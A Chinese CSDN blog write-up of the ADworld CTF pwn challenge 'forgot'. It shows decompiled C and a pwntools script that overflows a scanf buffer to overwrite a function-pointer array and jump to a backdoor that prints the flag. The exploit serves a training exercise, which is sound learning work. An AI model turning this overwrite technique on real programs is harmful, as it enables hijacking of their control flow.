ADworld pwn wp - forgot

最新推荐文章于 2022-03-31 00:48:46 发布
最新推荐文章于 2022-03-31 00:48:46 发布
阅读量116 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/117839946
版权

缓冲区溢出 函数指针 后门函数 代码安全 C语言
关键词由CSDN通过智能技术生成

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

int __cdecl main()
{
  size_t v0; // ebx
  char v2[32]; // [esp+10h] [ebp-74h] BYREF
  _DWORD v3[10]; // [esp+30h] [ebp-54h]
  char s[32]; // [esp+58h] [ebp-2Ch] BYREF
  int v5; // [esp+78h] [ebp-Ch]
  size_t i; // [esp+7Ch] [ebp-8h]

  v5 = 1;
  v3[0] = sub_8048604;
  v3[1] = sub_8048618;
  v3[2] = sub_804862C;
  v3[3] = sub_8048640;
  v3[4] = sub_8048654;
  v3[5] = sub_8048668;
  v3[6] = sub_804867C;
  v3[7] = sub_8048690;
  v3[8] = sub_80486A4;
  v3[9] = sub_80486B8;
  puts("What is your name?");
  printf("> ");
  fflush(stdout);
  fgets(s, 32, stdin);
  sub_80485DD(s);
  fflush(stdout);
  printf("I should give you a pointer perhaps. Here: %x\n\n", sub_8048654);
  fflush(stdout);
  puts("Enter the string to be validate");
  printf("> ");
  fflush(stdout);
  __isoc99_scanf("%s", v2);
  for ( i = 0; ; ++i )
  {
    v0 = i;
    if ( v0 >= strlen(v2) )
      break;
    switch ( v5 )
    {
      case 1:
        if ( sub_8048702(v2[i]) )
          v5 = 2;
        break;
      case 2:
        if ( v2[i] == 64 )
          v5 = 3;
        break;
      case 3:
        if ( sub_804874C(v2[i]) )
          v5 = 4;
        break;
      case 4:
        if ( v2[i] == '.' )
          v5 = 5;
        break;
      case 5:
        if ( sub_8048784(v2[i]) )
          v5 = 6;
        break;
      case 6:
        if ( sub_8048784(v2[i]) )
          v5 = 7;
        break;
      case 7:
        if ( sub_8048784(v2[i]) )
          v5 = 8;
        break;
      case 8:
        if ( sub_8048784(v2[i]) )
          v5 = 9;
        break;
      case 9:
        v5 = 10;
        break;
      default:
        continue;
    }
  }
  (v3[--v5])();
  return fflush(stdout);
}

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

找到后门函数sub_80486CC()

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

输入v2的时候可以溢出到v3, 覆盖函数地址到后门函数, 在(v3[--v5])();处可以调用后门函数实现cat flag. 覆盖v3[0] = sub_80486CC, 控制v5 == 1, 输入的字符串绕开switch维持v5为1, 即可调用后门.

from pwn import *
context.log_level = 'debug'
PORT = 51755
URL = "111.200.241.244"
sel = 1
io = process('./d033ab68b3e64913a1b6b1029ef3dc29') if sel == 0 else remote(URL, PORT)

off_addr = 0x20
vulfunc_addr = 0x080486CC
payload = b'F' * off_addr + p32(vulfunc_addr)

io.recvuntil('> ')
io.sendline('f')
io.recvuntil('> ')
io.sendline(payload)
io.interactive()

在这里插入图片描述

fa1c4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
adworld-wargame:我对https://adworld.xctf.org.cntask上的pwn挑战的利用
02-13
在本文中,我们将深入探讨一个名为"adworld-wargame"的在线Pwn挑战,该挑战源自https://adworld.xctf.org.cn/task平台。这个挑战主要涉及Python编程语言,这意味着我们需要熟悉Python的内存管理和安全特性来成功解决...
Adworld2012互联网营销世界大会PPT下载
07-23
教程名称: Adworld2012互联网营销世界大会PPT下载【】APPS新媒体运营及营销探索-岳建雄-搜狐【】体育营销动起来-陈鄂-力美【】品牌广告推动移动营销创新-郭伟-安沃传媒【】基于受众的网络广告交易市场-王岳龙-传漾...
[攻防世界 pwn]——forgot
Y_peak的博客
02-20 151
[攻防世界 pwn]——forgot 题目地址: https://adworld.xctf.org.cn/ 题目: 在checksec看下保护 在IDA中, 竟然有后面函数, 找到sub_80486CC函数地址 发现最后(*(&v3 + --v14))()执行 我们可以令v14 = 1这样就相当于v3所指向的函数执行 将v3所指向的函数地址覆盖为我们想要的函数地址就可以了 第一个栈溢出无法利用, 第二个可以利用 利用’\x00’开头的字符串绕过检查, v2距离v3 = 0x20 e
xctf社区题解1
Spwpun的博客
03-30 3183
web-新手模式: view-source: 鼠标右键被网页禁用了吧,F12查看即可: get_post: 提交之后,显示: robots: 访问robots.txt,发现f1ag_1s_h3re.php页面: 访问f1ag_1s_h3re.php页面: backup: 常见的备份文件后缀名有:.git .svn .swp .~ .bak .bash_history,访问提示如下: ...
xctf 攻防世界-forgot writeup
qq_43189757的博客
07-08 1766
根据ida反汇编的结果可以发现有两处溢出点,第一处溢出点没什么作用,只能观察第二处溢出点 可以观察到箭头处是个函数指针,&v3 是v3在栈上的地址,&v3 + --v14 是根据&v3在栈上移动,上面的for循环是用来改变v14的值,根据溢出点函数指针v3到v12 ,变量v14都可以被我们控制,接下来再找找有没有system函数 发现目标函数,接下来我的想法是利用缓冲...
ADworld pwn wp - hacknote
fa1c4的blog
08-30 187
前言 攻防世界的一道pwn, UAF漏洞 https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4717&page=2 分析过程 void __cdecl __noreturn main() { int v0; // eax char buf[4]; // [esp+8h] [ebp-10h] BYREF unsigned int v2; // [esp+Ch] [ebp-Ch
dice_game.zip
06-16
资源为攻防世界上的pwn题目样本,主要就是设计缓冲区溢出,大家也可在攻防世界pwn练习题中获取,地址为https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4694&page=1
【XCTF-RE】新手练习区-simple-unpack
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ld1cw8
Adworld2009互动营销年度盛典English介绍
09-18
Adworld2009互动营销年度盛典English介绍
pwntools中fmtstr的使用
fa1c4的blog
02-01 3778
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
[Windows] CVE-2011-2005 Afd.sys 本地提权漏洞复现
fa1c4的blog
01-26 3233
前言 这是一个微软在2011.10发布的补丁中提到的系统辅助驱动程序Afd.sys存在的本地提权漏洞, 影响到Windows XP, 和Windows Server 2003系统. 漏洞成因是Microsoft Windows Ancillary Function Driver(afd.sys)驱动程序没有完善检测用户提交的数据, 攻击者可以利用该漏洞执行任意代码. 漏洞分析 漏洞利用 总结 ...
kali安装checksec
fa1c4的blog
01-26 3206
git clone https://github.com/slimm609/checksec.sh.git cd checksec.sh sudo ln -s checksec /usr/local/bin/checksec 如果已存在checksec,用 sudo ln -sf checksec /usr/local/bin/checksec
Ubuntu16.04 pip安装pwntools出错
fa1c4的blog
02-23 3019
具体出错过程 Ubuntu16.04装pip, 然后用pip装pwntools会提示pip版本过低, 按给的命令更新之后pip就崩了 解决 先卸载pip https://blog.csdn.net/qq_33976344/article/details/113991528 然后下载文件进行安装 curl "https://bootstrap.pypa.io/get-pip.py" -o "get-pip.py" python3 get-pip.py python2 get-pip.py # 提示 ERR
BUUCTF pwn wp 81 - 85
fa1c4的blog
01-08 2891
wdb_2018_2nd_easyfmt int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[100]; // [esp+8h] [ebp-70h] BYREF unsigned int v4; // [esp+6Ch] [ebp-Ch] v4 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0);
Ubuntu安装checksec
fa1c4的blog
04-15 2535
环境配置, 纯命令行解决. # install git sudo apt-get install git ### cd git clone https://github.com/slimm609/checksec.sh sudo ln -sf ~/checksec.sh/checksec /usr/local/bin/checksec 经测试, 适用大部分版本Ubuntu.
确认main_arena相对libc的偏移地址
fa1c4的blog
08-26 2459
前言 打保护全开的堆题时碰到的问题, 大佬wp直接给exp, 但是奈何萌新很多细节不懂啊 现在记录一下寻找main_arena相对libc偏移的方法(又水一篇博客) 在0CTF 2017 babyheap这题中, 利用 fast chunk 和 small chunk 堆叠技术将main_arena的实际地址泄露出来, 另外通过这个相对偏移, 计算libc的加载基址, 完成libc泄露 过程 对照看下mallo.c的源码 方法一 逆向分析libc.so文件 拖进IDA 函数框搜索malloc_trim
pwn远程打通本地打不通的“玄学“问题解释
fa1c4的blog
09-30 2322
前言 速刷buu pwn题的时候碰到的问题, 本来配置了16/18/20三个版本虚拟机, 加上pwndocker, 基本可以涵盖各个版本环境的需求, 不过做到一个栈的题的时候发现出现了本地打不通, 远程能通的情况, 本来以为是个人的玄学体质导致的玄学bug, 搜索了解释, 才发现是另一回事 问题 查看本地glibc环境, 结果选择正确的glibc版本, 依然打不通本地 解决 参考 https://blog.csdn.net/fjh1997/article/details/107695261 得知glib
gcc编译的保护机制选项
fa1c4的blog
02-02 1888
linux下有5中程序保护机制 CANNARY 栈保护 NX no-execute PIE(ASLR) position-independent executables位置独立可执行区域; address space layout randomization内存地址随机化机制 RELRO read only relocation FOURTYFY_SOURCE 常用的机制有前4种: CANNARY, NX, PIE(ASLR), RELRO (1) CANNARY gcc -o test test
BUUCTF pwn wp 126 - 130
fa1c4的blog
03-31 1697
gyctf_2020_document ciscn_2019_final_5 roarctf_2019_realloc_magic houseoforange_hitcon_2016 SWPUCTF_2019_login
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值